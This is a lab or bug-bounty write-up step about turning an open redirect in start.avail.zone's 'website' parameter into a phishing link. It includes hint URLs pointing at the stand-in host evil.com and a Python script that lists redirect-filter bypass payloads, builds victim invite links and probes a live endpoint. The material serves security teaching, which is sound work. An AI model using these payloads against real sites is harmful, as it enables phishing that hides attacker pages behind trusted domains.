Hintru

Avail.zone – Open Redirect / SSRF via website Parameter

EN · easy · bug bounty writeup · Tags: Open Redirect, SSRF, parameter injection, URL manipulation, phishing, recon

A phishing/spam email promotes a 'free partnership tool' at start.avail.zone. The invite URL passes a domain through a query parameter — what does the server actually do with it? Investigate the request flow and find an abuse path that could turn this 'invite' into something nastier.


Step 3 · Weaponize the Reflected Behavior for Phishing

Objective: Construct a weaponised invite URL that redirects a victim from the trusted avail.zone domain to an attacker-controlled page.

Context: Links that start with a known domain (start.avail.zone) are far more convincing in phishing campaigns than a bare attacker domain. If the value of the `website` parameter is used as a redirect target, an attacker can hide an arbitrary destination behind the trusted domain name: the victim inspects a start.avail.zone link, clicks it, and lands on a page the attacker controls.

Progressive hints


Hint 1 — directional nudge

Think about what a victim sees in their email or chat: they hover over the link and see start.avail.zone — a domain that may appear trustworthy. What happens after they click?

Hint 2 — technique / vuln class

Test whether supplying a full URL (including scheme) in the `website` parameter causes the application to redirect there, e.g. `website=https://evil.com`.

Hint 3 — near solution

Try the following URL and observe where your browser ends up:
https://start.avail.zone/build-connections?website=https://evil.com
Also test with `//evil.com` (protocol-relative) if the full URL is sanitised. Confirm the finding from the raw response rather than from the browser alone (for example `curl -sI` on the URL): a 3xx status with a `Location` header pointing at evil.com is the server-side redirect, whereas a redirect performed by JavaScript or a meta refresh shows up only in the page body.
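The probing described in the hints above, as an added example written for this step (not code from the lab or from avail.zone). It assumes the `/build-connections` endpoint and `website` parameter from hint 3, a constructed attacker host `evil.com`, and, for the offline run, a stand-in server that copies the parameter straight into `Location`. It generalises hints 2 and 3 to the usual filter bypasses, resolves each `Location` value the way a browser would, and contrasts that with the prefix check an application might rely on:

```python
"""Open-redirect triage for a reflected URL parameter (here: `website`).

Added example for this lab step, not the lab's own code. Assumptions:
the endpoint https://start.avail.zone/build-connections (hint 3), a
constructed attacker host evil.com, and a stand-in server that echoes the
parameter into the Location header unchanged.
"""
import urllib.request
from urllib.error import HTTPError
from urllib.parse import quote, urljoin, urlsplit

TRUSTED_HOST = "start.avail.zone"
TARGET = f"https://{TRUSTED_HOST}/build-connections"  # assumed endpoint (hint 3)
ATTACKER = "evil.com"                                # constructed attacker host


def payloads(attacker=ATTACKER, trusted=TRUSTED_HOST):
    """Parameter values to try, from the obvious to common filter bypasses."""
    return [
        f"https://{attacker}",            # full URL with scheme (hint 2)
        f"//{attacker}",                  # protocol-relative (hint 3)
        f"https://{trusted}@{attacker}",  # userinfo: browser lands on the attacker host
        f"https://{trusted}.{attacker}",  # trusted host as a subdomain of the attacker's
        f"https://{attacker}/{trusted}",  # trusted host only in the path
        f"/\\{attacker}",                 # backslash; browsers normalise it to //
    ]


def invite_url(value, target=TARGET):
    """The link a victim receives: trusted origin, attacker-chosen destination."""
    return f"{target}?website={quote(value, safe='')}"


def final_host(location, request_url=TARGET):
    """Resolve a Location header as a browser would and return the host it lands on."""
    resolved = urljoin(request_url, location.replace("\\", "/"))
    return (urlsplit(resolved).hostname or "").lower()


def is_open_redirect(location, trusted=TRUSTED_HOST):
    """True when the redirect leaves the trusted site (subdomains of it count as on-site)."""
    host = final_host(location)
    return host != trusted and not host.endswith("." + trusted)


def naive_is_safe(value, trusted=TRUSTED_HOST):
    """Prefix check of the kind applications often ship; shown to contrast with final_host."""
    return value.startswith(f"https://{trusted}") or value.startswith("/")


def reflecting_server(value):
    """Constructed stand-in: a server that echoes `website` straight into Location."""
    return value


def triage(server=reflecting_server):
    """For every payload: (payload, host the browser lands on, off-site?, naive check passes?)."""
    return [(p, final_host(server(p)), is_open_redirect(server(p)), naive_is_safe(p))
            for p in payloads()]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following 3xx so the Location header can be inspected."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_location(url):
    """Live probe (not exercised offline): Location header of a 3xx response, else None."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        opener.open(url, timeout=10)
    except HTTPError as err:            # raised for any non-2xx once redirects are refused
        if 300 <= err.code < 400:
            return err.headers.get("Location")
    return None


if __name__ == "__main__":
    for payload, host, offsite, naive_ok in triage():
        print(f"{invite_url(payload)}\n   -> lands on {host}  off-site={offsite}  "
              f"naive_check_passes={naive_ok}")
```

Run it offline and every payload that the prefix check accepts still lands on evil.com, which is why a redirect target has to be validated on the parsed hostname (or against an allowlist of paths) rather than on the raw string. To probe the real endpoint, call `fetch_location(invite_url(p))` for each payload and feed the returned header to `is_open_redirect`; the live function is in the block for that purpose and is not needed for the offline demonstration.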
